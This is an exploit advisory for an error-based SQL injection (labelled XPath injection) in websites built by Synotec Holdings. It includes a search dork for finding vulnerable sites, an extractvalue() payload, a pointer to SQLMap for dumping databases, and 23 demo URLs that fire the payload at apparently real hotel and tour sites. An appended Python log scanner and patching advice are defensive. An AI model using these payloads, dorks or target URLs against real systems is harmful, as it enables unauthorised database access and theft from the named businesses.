# Exploit Title: WEB SITE BY Synotec Holdings Xpath Injection Vulnerability
# Dork: "WEB SITE BY: Synotec Holdings (Pvt) Ltd."
# Date: 2020-09-26
# Exploit Author: Behrouz Mansoori
# Vendor Homepage: https://www.synotec.lk
# Category: Webapps
# Tested on: Windows 10
=======================================
[+]Proof Of Concept:
[+]Exploit:
' and extractvalue(rand(),concat(0x7e,version()))--+
* You can use SQLMap, or apply the XPath injection technique manually, to retrieve all databases.
[+]Demo 1:
https://coralsandshotel.com/view_activities.php?id=8%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 2:
https://samara.lk/view-product.php?id=46%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 3:
https://www.applevacations.com.co/view-city.php?id=11%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--
[+]Demo 4:
http://www.unawatunadive.com/view-dive-courses.php?id=1%27%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--+
[+]Demo 5:
https://www.srilanka-round-tours.com/tour-packages.php?id=6%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 6:
https://visionlankatours.com/view-one-day-tour-package.php?id=2%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--
[+]Demo 7:
https://tamarindholiday.com/view-tour-package.php?id=11%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 8:
http://agpholdings.lk/product.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 9:
http://riverstonehotels.com/view-places.php?id=8%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 10:
http://srilankalasatours.com/view-tour.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 11:
http://www.thehorizonvilla.com/view-room.php?id=9%27%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--+
[+]Demo 12:
http://hiriketiyabeach.lk/room-view.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 13:
https://www.srilankaparadisetours.com/view-package.php?id=2%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 14:
http://www.shinyweddinghalls.shiny.lk/gallery.php?h=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 15:
https://www.mirissawhalewarriors.com/view-service.php?id=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 16:
http://horizon-villa.com/view-facilities.php?id=39%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--
[+]Demo 17:
http://www.newberlintours.lk/view-excursions.php?id=6%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 18:
http://gimlk.com/products.php?id=14%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 19:
https://susanthadriversrilanka.com/view-day-tour.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 20:
http://www.srilankasmarttours.com/booking-form.php?id=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 21:
http://srilankantimetraveller.com/view-package.php?id=32%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 22:
http://okithmatours.com/view-attractions.php?id=5%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 23:
http://www.touroflanka.com/view-tour.php?id=4%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
#########################################################
#Discovered by: Behrouz Mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
#########################################################
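
[+]Detection (added example, not part of the original advisory or the vendor's code):
The payloads above are error-based SQL injection through MySQL's extractvalue() XML function, sent both plain and wrapped in a /*!12345 ... */ versioned comment. The sketch below flags both forms in web access logs and also covers the sibling function updatexml(), which goes beyond the advisory. The log lines, host paths, client addresses and rule name are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# MySQL executes the body of /*!NNNNN ... */ versioned comments, so unwrap them
# before matching; ordinary /* ... */ comments are replaced by a space.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*.*?\*/", re.S)
# An XML function call whose arguments contain another SQL function call.
XML_ERR = re.compile(
    r"\b(?:extractvalue|updatexml)\s*\(.*?\b(?:concat|version|database|user)\s*\(",
    re.I | re.S)
LOG = re.compile(r'(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Sep/2020:10:01:02 +0000] "GET /view-item.php?id=8%27%20and%20'
    'extractvalue(rand(),concat(0x7e,version()))--+ HTTP/1.1" 200 512',
    '203.0.113.7 - - [26/Sep/2020:10:01:09 +0000] "GET /view-item.php?id=11%20and%20'
    '/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/-- HTTP/1.1" 200 498',
    '198.51.100.4 - - [26/Sep/2020:10:02:00 +0000] "GET /view-item.php?id=8 HTTP/1.1" 200 4096',
    '198.51.100.9 - - [26/Sep/2020:10:03:00 +0000] "GET /search.php?q=extractvalue+xpath+tutorial'
    ' HTTP/1.1" 200 2048',
]

def normalise(query):
    """URL-decode (bounded repeats, for double encoding) and strip SQL comments."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return PLAIN.sub(" ", VERSIONED.sub(r" \1 ", query))

def flag(line):
    """Return (client, path, rule) for a suspicious log line, else None."""
    m = LOG.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if XML_ERR.search(normalise(parts.query)):
        return (client, parts.path, "mysql-xml-error-sqli")
    return None

def scan(lines):
    return [hit for hit in map(flag, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Detection only narrows triage; the fix on the application side is to bind the id parameter in a prepared statement and to stop returning database error messages to the client.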